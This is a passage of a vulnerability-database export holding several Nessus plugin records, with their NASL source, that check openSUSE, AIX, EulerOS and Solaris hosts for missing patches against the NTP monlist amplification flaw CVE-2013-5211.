described in our\nsecurity advisory SUSE-SA:2014:001\nhttp://lists.opensuse.org/opensuse-security-announce/2014-01/msg00005.\nhtml\n\nand on http://support.novell.com/security/cve/CVE-2013-5211.html\n\nThis update now also replaces the default ntp.conf template to fix\nthis problem.\n\nPlease note that if you have touched or modified ntp.conf yourself, it\nwill not be automatically fixed, you need to merge the changes\nmanually as described.\"\n );\n # http://lists.opensuse.org/opensuse-security-announce/2014-01/msg00005.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?cf39e777\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-5211.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=857195\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected openSUSE-2014- packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'NTP Monitor List Scanner');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ntp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ntp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ntp-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/07/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/07/31\");\n 
script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n# Deprecated.\nexit(0, \"The associated patch is not currently a security fix.\");\n\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ntp-4.2.6p5-15.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ntp-debuginfo-4.2.6p5-15.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ntp-debugsource-4.2.6p5-15.5.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ntp\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T14:27:11", "description": "The monlist feature in ntpd in NTP allows remote attackers to cause a denial of service (traffic amplification) via forged (1) REQ_MON_GETLIST or (2) REQ_MON_GETLIST_1 
requests.", "cvss3": {}, "published": "2014-06-17T00:00:00", "type": "nessus", "title": "AIX 7.1 TL 2 : ntp (IV55365)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5211"], "modified": "2023-04-21T00:00:00", "cpe": ["cpe:/o:ibm:aix:7.1"], "id": "AIX_IV55365.NASL", "href": "https://www.tenable.com/plugins/nessus/76074", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text in the description was extracted from AIX Security\n# Advisory ntp_advisory.asc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(76074);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/21\");\n\n script_cve_id(\"CVE-2013-5211\");\n\n script_name(english:\"AIX 7.1 TL 2 : ntp (IV55365)\");\n script_summary(english:\"Check for APAR IV55365\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote AIX host is missing a security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The monlist feature in ntpd in NTP allows remote attackers to cause a\ndenial of service (traffic amplification) via forged (1)\nREQ_MON_GETLIST or (2) REQ_MON_GETLIST_1 requests.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://aix.software.ibm.com/aix/efixes/security/ntp_advisory.asc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install the appropriate interim fix.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:ibm:aix:7.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/06/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/06/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/17\");\n script_end_attributes();\n\n 
script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2023 Tenable Network Security, Inc.\");\n script_family(english:\"AIX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/AIX/lslpp\", \"Host/local_checks_enabled\", \"Host/AIX/version\");\n\n exit(0);\n}\n\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"aix.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif ( ! get_kb_item(\"Host/AIX/version\") ) audit(AUDIT_OS_NOT, \"AIX\");\nif ( ! get_kb_item(\"Host/AIX/lslpp\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif ( get_kb_item(\"Host/AIX/emgr_failure\" ) ) exit(0, \"This iFix check is disabled because : \"+get_kb_item(\"Host/AIX/emgr_failure\") );\n\nflag = 0;\n\nif (aix_check_ifix(release:\"7.1\", ml:\"02\", sp:\"04\", patch:\"IV55365s4a\", package:\"bos.net.tcp.client\", minfilesetver:\"7.1.2.0\", maxfilesetver:\"7.1.2.17\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:aix_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:57:44", "description": "According to the version of the ntp packages installed, the EulerOS installation on the remote host is affected by the following vulnerability :\n\n - The monlist feature in ntp_request.c in ntpd in NTP before 4.2.7p26 allows remote attackers to cause a denial of service (traffic amplification) via forged (1) REQ_MON_GETLIST or (2) REQ_MON_GETLIST_1 requests, as exploited in the wild in December 2013.(CVE-2013-5211)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2020-03-23T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP5 : ntp (EulerOS-SA-2020-1314)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5211"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:ntp", "p-cpe:/a:huawei:euleros:ntpdate", "p-cpe:/a:huawei:euleros:sntp", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2020-1314.NASL", "href": "https://www.tenable.com/plugins/nessus/134805", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(134805);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2013-5211\"\n );\n script_bugtraq_id(\n 64692\n );\n\n script_name(english:\"EulerOS 2.0 SP5 : ntp (EulerOS-SA-2020-1314)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the ntp packages installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerability :\n\n - The monlist feature in ntp_request.c in ntpd in NTP\n before 4.2.7p26 allows remote attackers to cause a\n denial of service (traffic amplification) via forged\n (1) REQ_MON_GETLIST or (2) REQ_MON_GETLIST_1 requests,\n as exploited in the wild in December\n 2013.(CVE-2013-5211)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-1314\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3885e27d\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected ntp package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/03/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/03/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:ntp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:ntpdate\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:sntp\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(5)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP5\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP5\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"ntp-4.2.6p5-28.h13.eulerosv2r7\",\n \"ntpdate-4.2.6p5-28.h13.eulerosv2r7\",\n \"sntp-4.2.6p5-28.h13.eulerosv2r7\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"5\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ntp\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T14:26:16", "description": "The monlist feature in ntpd in NTP allows remote 
attackers to cause a denial of service (traffic amplification) via forged (1) REQ_MON_GETLIST or (2) REQ_MON_GETLIST_1 requests.", "cvss3": {}, "published": "2014-06-17T00:00:00", "type": "nessus", "title": "AIX 5.3 TL 12 : ntp (IV59636)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5211"], "modified": "2023-04-21T00:00:00", "cpe": ["cpe:/o:ibm:aix:5.3"], "id": "AIX_IV59636.NASL", "href": "https://www.tenable.com/plugins/nessus/76080", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text in the description was extracted from AIX Security\n# Advisory ntp_advisory.asc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(76080);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/21\");\n\n script_cve_id(\"CVE-2013-5211\");\n\n script_name(english:\"AIX 5.3 TL 12 : ntp (IV59636)\");\n script_summary(english:\"Check for APAR IV59636\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote AIX host is missing a security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The monlist feature in ntpd in NTP allows remote attackers to cause a\ndenial of service (traffic amplification) via forged (1)\nREQ_MON_GETLIST or (2) REQ_MON_GETLIST_1 requests.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://aix.software.ibm.com/aix/efixes/security/ntp_advisory.asc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install the appropriate interim fix.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:ibm:aix:5.3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/06/12\");\n script_set_attribute(attribute:\"patch_publication_date\", 
value:\"2014/06/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2023 Tenable Network Security, Inc.\");\n script_family(english:\"AIX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/AIX/lslpp\", \"Host/local_checks_enabled\", \"Host/AIX/version\");\n\n exit(0);\n}\n\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"aix.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif ( ! get_kb_item(\"Host/AIX/version\") ) audit(AUDIT_OS_NOT, \"AIX\");\nif ( ! get_kb_item(\"Host/AIX/lslpp\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif ( get_kb_item(\"Host/AIX/emgr_failure\" ) ) exit(0, \"This iFix check is disabled because : \"+get_kb_item(\"Host/AIX/emgr_failure\") );\n\nflag = 0;\n\nif (aix_check_ifix(release:\"5.3\", ml:\"12\", sp:\"09\", patch:\"IV59636s9a\", package:\"bos.net.tcp.client\", minfilesetver:\"5.3.12.0\", maxfilesetver:\"5.3.12.10\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:aix_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:09:54", "description": "The remote Solaris system is missing necessary patches to address security updates :\n\n - The monlist feature in ntp_request.c in ntpd in NTP before 4.2.7p26 allows remote attackers to cause a denial of service (traffic amplification) via forged (1) REQ_MON_GETLIST or (2) REQ_MON_GETLIST_1 requests, as exploited in the wild in December 2013. 
(CVE-2013-5211)", "cvss3": {}, "published": "2015-01-19T00:00:00", "type": "nessus", "title": "Oracle Solaris Third-Party Patch Update : ntp (cve_2013_5211_input_validation)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5211"], "modified": "2021-01-14T00:00:00", "cpe": ["cpe:/o:oracle:solaris:11.1", "p-cpe:/a:oracle:solaris:ntp"], "id": "SOLARIS11_NTP_20140417.NASL", "href": "https://www.tenable.com/plugins/nessus/80714", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Oracle Third Party software advisories.\n#\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(80714);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2013-5211\");\n\n script_name(english:\"Oracle Solaris Third-Party Patch Update : ntp (cve_2013_5211_input_validation)\");\n script_summary(english:\"Check for the 'entire' version.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Solaris system is missing a security patch for third-party\nsoftware.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote Solaris system is missing necessary patches to address\nsecurity updates :\n\n - The monlist feature in ntp_request.c in ntpd in NTP\n before 4.2.7p26 allows remote attackers to cause a\n denial of service (traffic amplification) via forged (1)\n REQ_MON_GETLIST or (2) REQ_MON_GETLIST_1 requests, as\n exploited in the wild in December 2013. 
(CVE-2013-5211)\"\n );\n # https://www.oracle.com/technetwork/topics/security/thirdparty-patch-map-1482893.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4a913f44\"\n );\n # https://blogs.oracle.com/sunsecurity/cve-2013-5211-input-validation-vulnerability-in-ntp\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?71f18057\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Solaris 11.1.13.6.0.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:solaris:11.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:ntp\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris11/release\", \"Host/Solaris11/pkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"solaris.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Solaris11/release\");\nif (isnull(release)) audit(AUDIT_OS_NOT, \"Solaris11\");\npkg_list = solaris_pkg_list_leaves();\nif (isnull (pkg_list)) audit(AUDIT_PACKAGE_LIST_MISSING, \"Solaris pkg-list packages\");\n\nif (empty_or_null(egrep(string:pkg_list, pattern:\"^ntp$\"))) audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ntp\");\n\nflag = 0;\n\nif 
(solaris_check_release(release:\"0.5.11-0.175.1.13.0.6.0\", sru:\"SRU 11.1.13.6.0\") > 0) flag++;\n\nif (flag)\n{\n error_extra = 'Affected package : ntp\\n' + solaris_get_report2();\n error_extra = ereg_replace(pattern:\"version\", replace:\"OS version\", string:error_extra);\n if (report_verbosity > 0) security_warning(port:0, extra:error_extra);\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_PACKAGE_NOT_AFFECTED, \"ntp\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:21:17", "description": "The monlist feature in ntpd in NTP allows remote attackers to cause a denial of service (traffic amplification) via forged (1) REQ_MON_GETLIST or (2) REQ_MON_GETLIST_1 requests.", "cvss3": {}, "published": "2014-06-17T00:00:00", "type": "nessus", "title": "AIX 7.1 TL 3 : ntp (IV56324)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5211"], "modified": "2023-04-21T00:00:00", "cpe": ["cpe:/o:ibm:aix:7.1"], "id": "AIX_IV56324.NASL", "href": "https://www.tenable.com/plugins/nessus/76076", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text in the description was extracted from AIX Security\n# Advisory ntp_advisory.asc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(76076);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/21\");\n\n script_cve_id(\"CVE-2013-5211\");\n\n script_name(english:\"AIX 7.1 TL 3 : ntp (IV56324)\");\n script_summary(english:\"Check for APAR IV56324\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote AIX host is missing a security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The monlist feature in ntpd in NTP allows remote attackers to cause a\ndenial of service (traffic amplification) via forged (1)\nREQ_MON_GETLIST or (2) REQ_MON_GETLIST_1 requests.\"\n );\n script_set_attribute(\n 
attribute:\"see_also\",\n value:\"https://aix.software.ibm.com/aix/efixes/security/ntp_advisory.asc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install the appropriate interim fix.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:ibm:aix:7.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/06/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/06/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2023 Tenable Network Security, Inc.\");\n script_family(english:\"AIX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/AIX/lslpp\", \"Host/local_checks_enabled\", \"Host/AIX/version\");\n\n exit(0);\n}\n\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"aix.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif ( ! get_kb_item(\"Host/AIX/version\") ) audit(AUDIT_OS_NOT, \"AIX\");\nif ( ! 
get_kb_item(\"Host/AIX/lslpp\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif ( get_kb_item(\"Host/AIX/emgr_failure\" ) ) exit(0, \"This iFix check is disabled because : \"+get_kb_item(\"Host/AIX/emgr_failure\") );\n\nflag = 0;\n\nif (aix_check_ifix(release:\"7.1\", ml:\"03\", sp:\"02\", patch:\"IV56324s2a\", package:\"bos.net.tcp.client\", minfilesetver:\"7.1.3.0\", maxfilesetver:\"7.1.3.2\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:aix_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:22:42", "description": "The NTP time service could be used for remote denial of service amplification attacks.\n\nThis issue can be fixed by the administrator as we described in our security advisory SUSE-SA:2014:001 http://lists.opensuse.org/opensuse-security-announce/2014-01/msg00005.\nhtml\n\nand on http://support.novell.com/security/cve/CVE-2013-5211.html\n\nThis update now also replaces the default ntp.conf template to fix this problem.\n\nPlease note that if you have touched or modified ntp.conf yourself, it will not be automatically fixed, you need to merge the changes manually as described.", "cvss3": {}, "published": "2014-07-31T00:00:00", "type": "nessus", "title": "openSUSE Security Update : openSUSE-2014- (openSUSE-2014--1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5211"], "modified": "2014-08-08T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:ntp", "p-cpe:/a:novell:opensuse:ntp-debuginfo", "p-cpe:/a:novell:opensuse:ntp-debugsource", "cpe:/o:novell:opensuse:12.3"], "id": "SUSE_12_3_OPENSUSE-2014--140722.NASL", "href": "https://www.tenable.com/plugins/nessus/76930", "sourceData": "#%NASL_MIN_LEVEL 999999\n\n# @DEPRECATED@\n#\n# This script has been deprecated as the associated patch is not\n# currently a security fix.\n#\n# Disabled on 2014/08/08.\n#\n\n#\n# (C) Tenable Network 
Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2014--1.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(76930);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2018/07/20 0:18:55\");\n\n script_cve_id(\"CVE-2013-5211\");\n\n script_name(english:\"openSUSE Security Update : openSUSE-2014- (openSUSE-2014--1)\");\n script_summary(english:\"Check for the openSUSE-2014--1 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The NTP time service could be used for remote denial of service\namplification attacks.\n\nThis issue can be fixed by the administrator as we described in our\nsecurity advisory SUSE-SA:2014:001\nhttp://lists.opensuse.org/opensuse-security-announce/2014-01/msg00005.\nhtml\n\nand on http://support.novell.com/security/cve/CVE-2013-5211.html\n\nThis update now also replaces the default ntp.conf template to fix\nthis problem.\n\nPlease note that if you have touched or modified ntp.conf yourself, it\nwill not be automatically fixed, you need to merge the changes\nmanually as described.\"\n );\n # http://lists.opensuse.org/opensuse-security-announce/2014-01/msg00005.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?cf39e777\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-5211.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=857195\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected openSUSE-2014- packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", 
value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'NTP Monitor List Scanner');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ntp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ntp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ntp-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/07/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/07/31\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable 